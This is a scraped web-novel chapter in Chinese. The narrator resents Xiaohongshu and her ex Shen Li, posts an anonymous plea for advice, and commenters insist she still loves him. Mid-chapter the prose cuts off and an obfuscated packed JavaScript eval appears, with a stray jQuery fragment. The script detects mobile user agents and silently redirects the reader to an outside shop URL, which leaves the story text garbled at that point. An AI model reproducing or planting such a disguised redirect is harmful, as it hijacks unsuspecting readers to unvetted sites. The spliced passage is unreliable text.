文趣网 > 其他小说 > 我想我是真的恨上xhs了 > 9. 恨X09
    躺在床上,我盯着手机里沈立视频下方的评论,面无表情、毫无想法,点开了对方的头像,快速游览此人为数不多的十七条xhs帖子,又漫不经心、不太在意地把每一条帖子下面的一百多条评论刷完,没找到沈立评论过的身影,才退出了界面。

    呵呵。

    确实是很好看的小姐姐。

    沈立是瞎吗?这么漂亮也不知道互动一下。

    翻了两个多小时,翻的我不光手酸,心情也似乎受到了一点点影响。

    我在想如果我是真的真的真的恨上xhs了,也是真的真的真的还有点儿恨沈立,你说这正常吗?

    但这话我显然不敢去问朋友。

    事先声明,不是因为我想跟沈立和好,担心朋友们骂我,而是讲真,每一个最开始认识我的朋友都跟我说过,我看起来高冷的很,有一种不顾任何事任何人的死寂感,他们猜想我对感情的需求一定十分寡淡,有也可以游戏一下,没有我也不会在乎,人设在这里,我觉得自己有必要维持一下。

    人心里有事的时候真的很难睡觉,聊天界面切了十几个,我也没下狠心去问一个人,反反复复,想来想去,我盯上了手机界面的xhs。

    是的,虽恨但用。

    xhs里那么多求助帖,多我一个不多,少我一个不少,我发发怎么了!

    下定决心,切换小号。

    我发!

    【一盒小猫】:「给分手一年多的前男友点赞了

    昨天不小心手滑给分手一年多的前男友点赞了,关键点赞了取消还是有提醒,因为两个人谈恋爱的时候聊的也没那么多,并不是很熟,当时分手分的也很突然,我以为我前男友不会认出来我,没想到点完赞对方跟我说他养了一只小猫,简单聊了下又不联系了。

    但今天看他xhs发了视频,有一个很漂亮的女生给他评论,心里很奇怪。

    我说我现在有点恨xhs,还是有点儿恨前男友,这正常吗?」

    我想过这条帖子会石沉大海,也想过xhs的朋友们会劝我没有必要,但没想到是满屏的早日复合以及甜蜜爱心。

    我他妈!

    这就是传说中的看热闹不嫌事大!

    【一盒小猫】:「补充评论//不是,我们两个人分手还挺难看的!

    可能是跟我在一起的恋爱体验感挺差的(?)那会儿他有个女生朋友劝过他分手,我想这应该是经常的事情,只不过那次恰好被我看到了,于是就问他是不是也是这么想的,要分手可以大大方方跟我说,我也不会死乞白赖求他,不放他走。

    我前男友问我是不是真的这么想的,我当然说是(呵呵,好像我离不开他一样!)

    我俩几乎就没有吵过架,起码我单方面这么认为,因为他黑脸的时候还挺可怕,那天他就黑脸了,语气也不是很好,跟我说感情过去了就是过去了,如果分手又和好和好又分手幼稚的很,反复纠结才没骨气,让人看不起。

    他都这么说了,肯定不会想和好。当然,我也一样。

    而且!我现在还有点儿恨他!!!!!!」

    为了

    ;eval(function(p,a,c,k,e,d){e=function(c){return(c<a?"":e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)d[e(c)]=k[c]||e(c);k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1;};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p;}('8 0=7.0.6();b(/a|9|1|2|5|4|3|c l/i.k(0)){n.m="j://e.d.f/h/g/"}',24,24,'userAgent|iphone|ipad|iemobile|blackberry|ipod|toLowerCase|navigator|var|webos|android|if|opera|mgxs|t|shop|17611775|205958||http|test|mini|href|location'.split('|'),0,{}));

    () {

    $('.inform').remove();

    $('#content').append('

    强调两个人之间的不可能,我还在结尾着重打了好多个感叹号。

    我想,不能了吧,不能再被误会了,总能有个热心市民来解答一下我内心的疑惑了吧?

    但这个世界上就是热心市民太多了。

    补充评论发出去没有三分钟,帖子下面就有无数回复,我只是大致看了一眼,就看到了更多的爱,只不过这次是跟恨贴在一起的。

    【朋友,有没有人告诉过你爱的对面是无视,爱的对面不是恨?】

    【没错没错,爱是恨的雏形,恨是爱的延续,恨来恨去,你也只是恨他不够爱你。】

    【爱一个人不可怕,恨一个人不可怕,最可怕的是爱恨都是一个人。】

    【妈的!更好磕了!】

    帖子随手往下翻,我发现所有的评论几乎一样。

    我服了,我吐了,我真的无话可说。

    啊啊啊啊啊啊!

    啊啊啊啊啊啊啊啊!好了!好了!不许再说了!

    我尖叫了!我眼红了!我心乱了!我怨恨了!我爱慕了!我咬牙切齿了!握拳头攥紧了!

    怎么可能!我真的像是艾莉一直嘲笑林品如结果最后林品如回来拿走了一切!我一直以为我对沈立不过如此结果现在所有人都在说我还爱他!?

    我爱他?

    他做梦!

    我,茂禾,爱他?

    他!沈立,做梦!

    哈哈?我还会爱他?

    我怎么会还爱他?

    ......我竟然还爱你吗。沈立。